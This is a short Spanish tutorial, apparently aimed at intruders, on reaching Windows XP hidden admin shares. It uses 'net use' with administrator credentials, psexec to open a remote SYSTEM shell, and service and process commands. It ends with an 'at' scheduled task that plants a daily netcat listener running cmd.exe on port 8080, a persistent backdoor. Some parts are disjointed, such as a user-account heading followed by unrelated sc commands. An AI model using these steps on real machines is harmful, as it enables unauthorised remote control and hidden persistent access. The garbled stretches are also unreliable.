XP comparte por defecto sus unidades a efectos de administración. Estas unidades estan ocultas a la red al llevar el sufijo $.
Para acceder desde DOS a estos recursos desde otro ordenador de la red se usa el comando Net use. Este comando es un poco remolón y a veces como que se empeña en no dejar conectarnos. La sintaxis completa es:
net use \\ip_remota\ password_pc_remoto/u:ip_remota\administrador_pc_remoto
En este punto tendremos ya mapeada la unidad del pc remoto y podremos trabajar con sus ficheros como si fuese un disco más de nuestro ordenador. Para usar este comando basta con que el pc remoto esté encendido, no hace falta que tenga ninguna sesión iniciada Cuando acabemos nuestra tarea debemos acordarnos de quitar el recurso que acabamos de compartir.
Eso se hace mediante el comando:
Net use /delete Net use * /delete (elimina todas las unidades compartidas)
Con psexec:
psexec \\ip_remota –u -p -s
ej: psexec \\xxx.xxx.xx.xx –u administrador –p miclave –s cmd
Manipular grupos y cuentas de usuarios Usaremos el comando NET para crear y borrar usuarios y asignarlos a los grupos que más nos interesen. Las que más pueden servirnos para nuestros propósitos son:
sc query Muestra información sobre los servicios y su estado en la máuina en la que se ejecuta.
sc config Permite configurar diversas propiedades del servicio (habiltar, deshabilitar, inicio manual o automatico.
Tasklist lista los procesos en ejecución, para entendernos es como si fuese el administrador de tareas en linea de comandos
Taskkill /F /PID permite forzar el cierre de un proceso identificado por su PID.
Ejecutar una tarea programada en remoto
Podemos usar en el pc remoto el comando AT para programarle tareas. Por ejemplo:
at \\ip_remota 12:00A /every:1 “” nc –d –L –p 8080 –e cmd.exe
